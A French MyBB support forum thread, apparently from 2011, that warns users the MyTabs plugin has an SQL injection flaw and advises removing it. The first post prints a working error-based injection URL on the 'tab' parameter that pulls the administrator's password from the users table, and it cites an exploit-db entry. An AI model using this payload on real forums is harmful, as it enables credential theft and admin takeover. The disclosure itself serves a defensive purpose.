1. IMPORTANT : Nouvelles mesures de sécurité - 2. Règles pour obtenir de l'aide dans les forums de support - 3. Restrictions des droits pour le groupe "Support suspendu"

Il est obligatoire de respecter les Règles de MyBB.fr : Version abrégée ou Version complète pour obtenir du support sur nos forums.

Les membres ayant un site/forum contrevenant aux règles de MyBB.support seront placés dans le groupe "Support suspendu" et ne bénéficieront plus du support du staff. Nous recommandons aux autres membres d'agir de même. Il ne s'agit pas d'un bannissement, le membre retrouvera son statut "normal" dès que sa situation sera conforme aux règles.

Nouveau : un Wiki en français : plus de détails.
Avant de soumettre votre problème, consultez-le, ainsi que la FAQ, sans oublier le moteur de recherche interne.


Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
MyTabs SQL Vulnerabilty
Mots-clés » mytabs, sql, vulnerabilty
10-08-2011, 20:41, (Modification du message : 10-08-2011, 20:52 par dipsiii.)
#1
MyTabs SQL Vulnerabilty
Attention,


Le plugin mytabs possède une erreur SQL et on peut avoir accès à l’administration.

La seul solution est de supprimer le plugin.

Code :
http://localhost/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select [b]password[/b] from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

http://www.exploit-db.com/exploits/17595/
Répondre
11-08-2011, 0:04, (Modification du message : 11-08-2011, 0:05 par valix.)
#2
RE: MyTabs SQL Vulnerabilty
Ouai j'avais dit a exdiogene et sa spyto , mais vu qu'il mon pas répondu ^^
Répondre




Utilisateur(s) parcourant ce sujet : 2 visiteur(s)

Contact | MyBB.support | Retourner en haut | Retourner au contenu | Version bas-débit (Archivé) | Syndication RSS
 Utilitaire de traduction fourni par Regentronique